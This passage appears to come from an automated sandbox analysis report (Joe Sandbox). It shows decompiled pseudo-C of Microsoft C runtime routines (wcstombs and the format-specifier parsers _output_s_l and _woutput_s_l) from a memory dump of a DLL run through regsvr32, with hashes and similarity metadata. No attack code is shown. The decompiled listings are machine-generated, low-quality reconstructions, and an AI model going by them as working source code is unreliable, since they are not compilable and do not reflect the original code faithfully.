                                                  				_v24 =  *((intOrPtr*)( *_t41 + 4));
                                                  				E000007FE7FEF9D26800( &_v64);
                                                  				goto 0xf9d29ff9;
                                                  				_v20 = _a8;
                                                  				E000007FE7FEF9D26800( &_v64);
                                                  				return _v20;
                                                  			}












                                                  0x7fef9d29f20
                                                  0x7fef9d29f20
                                                  0x7fef9d29f28
                                                  0x7fef9d29f31
                                                  0x7fef9d29f44
                                                  0x7fef9d29f4a
                                                  0x7fef9d29f59
                                                  0x7fef9d29f5b
                                                  0x7fef9d29f6b
                                                  0x7fef9d29f74
                                                  0x7fef9d29f7f
                                                  0x7fef9d29f86
                                                  0x7fef9d29f88
                                                  0x7fef9d29f98
                                                  0x7fef9d29fa1
                                                  0x7fef9d29fa6
                                                  0x7fef9d29fac
                                                  0x7fef9d29fb3
                                                  0x7fef9d29fb5
                                                  0x7fef9d29fc4
                                                  0x7fef9d29fcf
                                                  0x7fef9d29fd8
                                                  0x7fef9d29fe1
                                                  0x7fef9d29fe7
                                                  0x7fef9d29ff0
                                                  0x7fef9d29ffd

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_
                                                  • String ID:
                                                  • API String ID: 1901436342-0
                                                  • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                  • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                                  • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                  • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                                  • API String ID: 2123368286-552404435
                                                  • Opcode ID: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                  • Instruction ID: a80555c9662aee50eaf55af6b2d7c09464ca7ea00ccabcf41043a4b878837ec0
                                                  • Opcode Fuzzy Hash: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                  • Instruction Fuzzy Hash: 4B511726A0DBC586E6B48B19E84476EB3E0F386361F204625D6ED43BE8DF7ED4458B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 28%
                                                  			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                  				void* _t184;
                                                  				char* _t204;
                                                  				char* _t205;
                                                  
                                                  				_a112 = 0;
                                                  				_a108 = _a112;
                                                  				_a88 = _a108;
                                                  				_a92 = _a88;
                                                  				_a80 = 0;
                                                  				_a116 = 0xffffffff;
                                                  				_a76 = 0;
                                                  				_a968 = _a696 & 0x000000ff;
                                                  				if (_a968 == 0x20) goto 0xf9d3bd57;
                                                  				if (_a968 == 0x23) goto 0xf9d3bd64;
                                                  				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                                  				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                                  				if (_a968 == 0x30) goto 0xf9d3bd72;
                                                  				goto 0xf9d3bd7d;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				goto 0xf9d3bd7d;
                                                  				_a80 = _a80 | 0x00000001;
                                                  				goto 0xf9d3bd7d;
                                                  				_a80 = _a80 | 0x00000002;
                                                  				goto 0xf9d3bd7d;
                                                  				asm("bts eax, 0x7");
                                                  				goto 0xf9d3bd7d;
                                                  				_a80 = _a80 | 0x00000008;
                                                  				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                  				_t204 =  &_a1112;
                                                  				_a88 = E000007FE7FEF9D31E40(_t204);
                                                  				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				_a88 =  ~_a88;
                                                  				goto 0xf9d3bdd5;
                                                  				_a88 = _t184 + _t204 - 0x30;
                                                  				_a116 = 0;
                                                  				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                  				_t205 =  &_a1112;
                                                  				_a116 = E000007FE7FEF9D31E40(_t205);
                                                  				if (_a116 >= 0) goto 0xf9d3be14;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3be2d;
                                                  				_a116 = _t184 + _t205 - 0x30;
                                                  				_a972 = _a696 & 0x000000ff;
                                                  				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                  				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                  				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                  				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                  				goto 0xf9d3bfd9;
                                                  				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                  				_a1096 = _a1096 + 1;
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3beb2;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xf");
                                                  				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                  				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                  				goto 0xf9d3bfbe;
                                                  				_a704 = 0;
                                                  				goto E000007FE7FEF9D3BB66;
                                                  				goto 0xf9d3bfd9;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xb");
                                                  				_a976 = _a696;
                                                  				_a976 = _a976 - 0x41;
                                                  				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                  				goto __rax;
                                                  			}






                                                  0x7fef9d3bcbd
                                                  0x7fef9d3bcc9
                                                  0x7fef9d3bcd1
                                                  0x7fef9d3bcd9
                                                  0x7fef9d3bcdd
                                                  0x7fef9d3bce5
                                                  0x7fef9d3bced
                                                  0x7fef9d3bd02
                                                  0x7fef9d3bd11
                                                  0x7fef9d3bd1b
                                                  0x7fef9d3bd25
                                                  0x7fef9d3bd2f
                                                  0x7fef9d3bd39
                                                  0x7fef9d3bd3b
                                                  0x7fef9d3bd44
                                                  0x7fef9d3bd48
                                                  0x7fef9d3bd51
                                                  0x7fef9d3bd55
                                                  0x7fef9d3bd5e
                                                  0x7fef9d3bd62
                                                  0x7fef9d3bd68
                                                  0x7fef9d3bd70
                                                  0x7fef9d3bd79
                                                  0x7fef9d3bd8d
                                                  0x7fef9d3bd8f
                                                  0x7fef9d3bd9c
                                                  0x7fef9d3bda5
                                                  0x7fef9d3bdae
                                                  0x7fef9d3bdb8
                                                  0x7fef9d3bdbc
                                                  0x7fef9d3bdd1
                                                  0x7fef9d3bdda
                                                  0x7fef9d3bdf2
                                                  0x7fef9d3bdf4
                                                  0x7fef9d3be01
                                                  0x7fef9d3be0a
                                                  0x7fef9d3be0c
                                                  0x7fef9d3be14
                                                  0x7fef9d3be29
                                                  0x7fef9d3be3a
                                                  0x7fef9d3be49
                                                  0x7fef9d3be53
                                                  0x7fef9d3be61
                                                  0x7fef9d3be6b
                                                  0x7fef9d3be71
                                                  0x7fef9d3be84
                                                  0x7fef9d3be91
                                                  0x7fef9d3be9d
                                                  0x7fef9d3bea5
                                                  0x7fef9d3beae
                                                  0x7fef9d3beb2
                                                  0x7fef9d3bebb
                                                  0x7fef9d3bed1
                                                  0x7fef9d3bee2
                                                  0x7fef9d3bef0
                                                  0x7fef9d3befc
                                                  0x7fef9d3bf04
                                                  0x7fef9d3bf17
                                                  0x7fef9d3bf28
                                                  0x7fef9d3bf36
                                                  0x7fef9d3bf42
                                                  0x7fef9d3bf4a
                                                  0x7fef9d3bf5a
                                                  0x7fef9d3bf6a
                                                  0x7fef9d3bf7a
                                                  0x7fef9d3bf8a
                                                  0x7fef9d3bf9a
                                                  0x7fef9d3bfaa
                                                  0x7fef9d3bfac
                                                  0x7fef9d3bfae
                                                  0x7fef9d3bfb9
                                                  0x7fef9d3bfbe
                                                  0x7fef9d3bfc7
                                                  0x7fef9d3bfcb
                                                  0x7fef9d3bfd1
                                                  0x7fef9d3bfe6
                                                  0x7fef9d3bff7
                                                  0x7fef9d3c006
                                                  0x7fef9d3c02d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2192614184-192189897
                                                  • Opcode ID: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                  • Instruction ID: 366f55b25be61a8d80973343189ccb34eb8cf05d0f6555861afeb0151a731927
                                                  • Opcode Fuzzy Hash: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                  • Instruction Fuzzy Hash: 1A414C72A0D6C28AE3B0DB24E8547BEB7E4F384345F600126E6D887AA9DB7DD541CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 28%
                                                  			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                  				void* _t184;
                                                  				char* _t204;
                                                  				char* _t205;
                                                  
                                                  				_a112 = 0;
                                                  				_a108 = _a112;
                                                  				_a88 = _a108;
                                                  				_a92 = _a88;
                                                  				_a80 = 0;
                                                  				_a116 = 0xffffffff;
                                                  				_a76 = 0;
                                                  				_a1404 = _a1208 & 0x0000ffff;
                                                  				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                  				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                  				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                  				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                  				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000001;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000002;
                                                  				goto 0xf9d3dd2b;
                                                  				asm("bts eax, 0x7");
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000008;
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                  				_t204 =  &_a1560;
                                                  				_a88 = E000007FE7FEF9D31E40(_t204);
                                                  				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				_a88 =  ~_a88;
                                                  				goto 0xf9d3dd83;
                                                  				_a88 = _t184 + _t204 - 0x30;
                                                  				_a116 = 0;
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                  				_t205 =  &_a1560;
                                                  				_a116 = E000007FE7FEF9D31E40(_t205);
                                                  				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3dddb;
                                                  				_a116 = _t184 + _t205 - 0x30;
                                                  				_a1408 = _a1208 & 0x0000ffff;
                                                  				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                  				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                  				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                  				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                  				goto 0xf9d3df88;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                  				_a1544 =  &(_a1544[1]);
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3de61;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xf");
                                                  				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                  				goto 0xf9d3df6d;
                                                  				_a1216 = 0;
                                                  				goto E000007FE7FEF9D3DC41;
                                                  				goto 0xf9d3df88;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xb");
                                                  				_a1412 = _a1208 & 0x0000ffff;
                                                  				_a1412 = _a1412 - 0x41;
                                                  				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                  				goto __rax;
                                                  			}






                                                  0x7fef9d3dc6b
                                                  0x7fef9d3dc77
                                                  0x7fef9d3dc7f
                                                  0x7fef9d3dc87
                                                  0x7fef9d3dc8b
                                                  0x7fef9d3dc93
                                                  0x7fef9d3dc9b
                                                  0x7fef9d3dcb0
                                                  0x7fef9d3dcbf
                                                  0x7fef9d3dcc9
                                                  0x7fef9d3dcd3
                                                  0x7fef9d3dcdd
                                                  0x7fef9d3dce7
                                                  0x7fef9d3dce9
                                                  0x7fef9d3dcf2
                                                  0x7fef9d3dcf6
                                                  0x7fef9d3dcff
                                                  0x7fef9d3dd03
                                                  0x7fef9d3dd0c
                                                  0x7fef9d3dd10
                                                  0x7fef9d3dd16
                                                  0x7fef9d3dd1e
                                                  0x7fef9d3dd27
                                                  0x7fef9d3dd3b
                                                  0x7fef9d3dd3d
                                                  0x7fef9d3dd4a
                                                  0x7fef9d3dd53
                                                  0x7fef9d3dd5c
                                                  0x7fef9d3dd66
                                                  0x7fef9d3dd6a
                                                  0x7fef9d3dd7f
                                                  0x7fef9d3dd88
                                                  0x7fef9d3dda0
                                                  0x7fef9d3dda2
                                                  0x7fef9d3ddaf
                                                  0x7fef9d3ddb8
                                                  0x7fef9d3ddba
                                                  0x7fef9d3ddc2
                                                  0x7fef9d3ddd7
                                                  0x7fef9d3dde8
                                                  0x7fef9d3ddf7
                                                  0x7fef9d3de01
                                                  0x7fef9d3de0f
                                                  0x7fef9d3de19
                                                  0x7fef9d3de1f
                                                  0x7fef9d3de32
                                                  0x7fef9d3de40
                                                  0x7fef9d3de4c
                                                  0x7fef9d3de54
                                                  0x7fef9d3de5d
                                                  0x7fef9d3de61
                                                  0x7fef9d3de6a
                                                  0x7fef9d3de80
                                                  0x7fef9d3de91
                                                  0x7fef9d3de9f
                                                  0x7fef9d3deab
                                                  0x7fef9d3deb3
                                                  0x7fef9d3dec6
                                                  0x7fef9d3ded7
                                                  0x7fef9d3dee5
                                                  0x7fef9d3def1
                                                  0x7fef9d3def9
                                                  0x7fef9d3df09
                                                  0x7fef9d3df19
                                                  0x7fef9d3df29
                                                  0x7fef9d3df39
                                                  0x7fef9d3df49
                                                  0x7fef9d3df59
                                                  0x7fef9d3df5b
                                                  0x7fef9d3df5d
                                                  0x7fef9d3df68
                                                  0x7fef9d3df6d
                                                  0x7fef9d3df76
                                                  0x7fef9d3df7a
                                                  0x7fef9d3df80
                                                  0x7fef9d3df95
                                                  0x7fef9d3dfa6
                                                  0x7fef9d3dfb5
                                                  0x7fef9d3dfdc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2192614184-734865713
                                                  • Opcode ID: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                  • Instruction ID: 2534415b6cec3e8c7a7064d8bee2958269565171124d4a2b4bf05b50673a9d36
                                                  • Opcode Fuzzy Hash: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                  • Instruction Fuzzy Hash: 4C411CB2A0C6C18AE3B0CB64E8447BEB7E0F384345F600125E6D987AA8DB7DD444CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 28%
                                                  			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
                                                  				void* _t190;
                                                  				char* _t210;
                                                  				char* _t211;
                                                  
                                                  				_a76 = 1;
                                                  				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
                                                  				_a112 = 0;
                                                  				_a108 = _a112;
                                                  				_a88 = _a108;
                                                  				_a92 = _a88;
                                                  				_a80 = 0;
                                                  				_a116 = 0xffffffff;
                                                  				_a76 = 0;
                                                  				_a1404 = _a1208 & 0x0000ffff;
                                                  				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                  				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                  				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                  				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                  				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000001;
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000002;
                                                  				goto 0xf9d3dd2b;
                                                  				asm("bts eax, 0x7");
                                                  				goto 0xf9d3dd2b;
                                                  				_a80 = _a80 | 0x00000008;
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                  				_t210 =  &_a1560;
                                                  				_a88 = E000007FE7FEF9D31E40(_t210);
                                                  				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                  				_a80 = _a80 | 0x00000004;
                                                  				_a88 =  ~_a88;
                                                  				goto 0xf9d3dd83;
                                                  				_a88 = _t190 + _t210 - 0x30;
                                                  				_a116 = 0;
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                  				_t211 =  &_a1560;
                                                  				_a116 = E000007FE7FEF9D31E40(_t211);
                                                  				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3dddb;
                                                  				_a116 = _t190 + _t211 - 0x30;
                                                  				_a1408 = _a1208 & 0x0000ffff;
                                                  				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                  				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                  				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                  				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                  				goto 0xf9d3df88;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                  				_a1544 =  &(_a1544[1]);
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3de61;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xf");
                                                  				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                  				goto 0xf9d3df6d;
                                                  				_a1216 = 0;
                                                  				goto E000007FE7FEF9D3DC41;
                                                  				goto 0xf9d3df88;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xb");
                                                  				_a1412 = _a1208 & 0x0000ffff;
                                                  				_a1412 = _a1412 - 0x41;
                                                  				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                  				goto __rax;
                                                  			}






                                                  0x7fef9d3dc41
                                                  0x7fef9d3dc61
                                                  0x7fef9d3dc6b
                                                  0x7fef9d3dc77
                                                  0x7fef9d3dc7f
                                                  0x7fef9d3dc87
                                                  0x7fef9d3dc8b
                                                  0x7fef9d3dc93
                                                  0x7fef9d3dc9b
                                                  0x7fef9d3dcb0
                                                  0x7fef9d3dcbf
                                                  0x7fef9d3dcc9
                                                  0x7fef9d3dcd3
                                                  0x7fef9d3dcdd
                                                  0x7fef9d3dce7
                                                  0x7fef9d3dce9
                                                  0x7fef9d3dcf2
                                                  0x7fef9d3dcf6
                                                  0x7fef9d3dcff
                                                  0x7fef9d3dd03
                                                  0x7fef9d3dd0c
                                                  0x7fef9d3dd10
                                                  0x7fef9d3dd16
                                                  0x7fef9d3dd1e
                                                  0x7fef9d3dd27
                                                  0x7fef9d3dd3b
                                                  0x7fef9d3dd3d
                                                  0x7fef9d3dd4a
                                                  0x7fef9d3dd53
                                                  0x7fef9d3dd5c
                                                  0x7fef9d3dd66
                                                  0x7fef9d3dd6a
                                                  0x7fef9d3dd7f
                                                  0x7fef9d3dd88
                                                  0x7fef9d3dda0
                                                  0x7fef9d3dda2
                                                  0x7fef9d3ddaf
                                                  0x7fef9d3ddb8
                                                  0x7fef9d3ddba
                                                  0x7fef9d3ddc2
                                                  0x7fef9d3ddd7
                                                  0x7fef9d3dde8
                                                  0x7fef9d3ddf7
                                                  0x7fef9d3de01
                                                  0x7fef9d3de0f
                                                  0x7fef9d3de19
                                                  0x7fef9d3de1f
                                                  0x7fef9d3de32
                                                  0x7fef9d3de40
                                                  0x7fef9d3de4c
                                                  0x7fef9d3de54
                                                  0x7fef9d3de5d
                                                  0x7fef9d3de61
                                                  0x7fef9d3de6a
                                                  0x7fef9d3de80
                                                  0x7fef9d3de91
                                                  0x7fef9d3de9f
                                                  0x7fef9d3deab
                                                  0x7fef9d3deb3
                                                  0x7fef9d3dec6
                                                  0x7fef9d3ded7
                                                  0x7fef9d3dee5
                                                  0x7fef9d3def1
                                                  0x7fef9d3def9
                                                  0x7fef9d3df09
                                                  0x7fef9d3df19
                                                  0x7fef9d3df29
                                                  0x7fef9d3df39
                                                  0x7fef9d3df49
                                                  0x7fef9d3df59
                                                  0x7fef9d3df5b
                                                  0x7fef9d3df5d
                                                  0x7fef9d3df68
                                                  0x7fef9d3df6d
                                                  0x7fef9d3df76
                                                  0x7fef9d3df7a
                                                  0x7fef9d3df80
                                                  0x7fef9d3df95
                                                  0x7fef9d3dfa6
                                                  0x7fef9d3dfb5
                                                  0x7fef9d3dfdc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2192614184-734865713
                                                  • Opcode ID: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                  • Instruction ID: 4e41d9db2091814ce308bd8b3badba688d1355b6a5e36393cab3bd2279fd69d5
                                                  • Opcode Fuzzy Hash: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                  • Instruction Fuzzy Hash: 01412AB2A0C6C286E7F09B64E8407BEB2E4F384346F600126D6CD876A9DB3ED444CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 24%
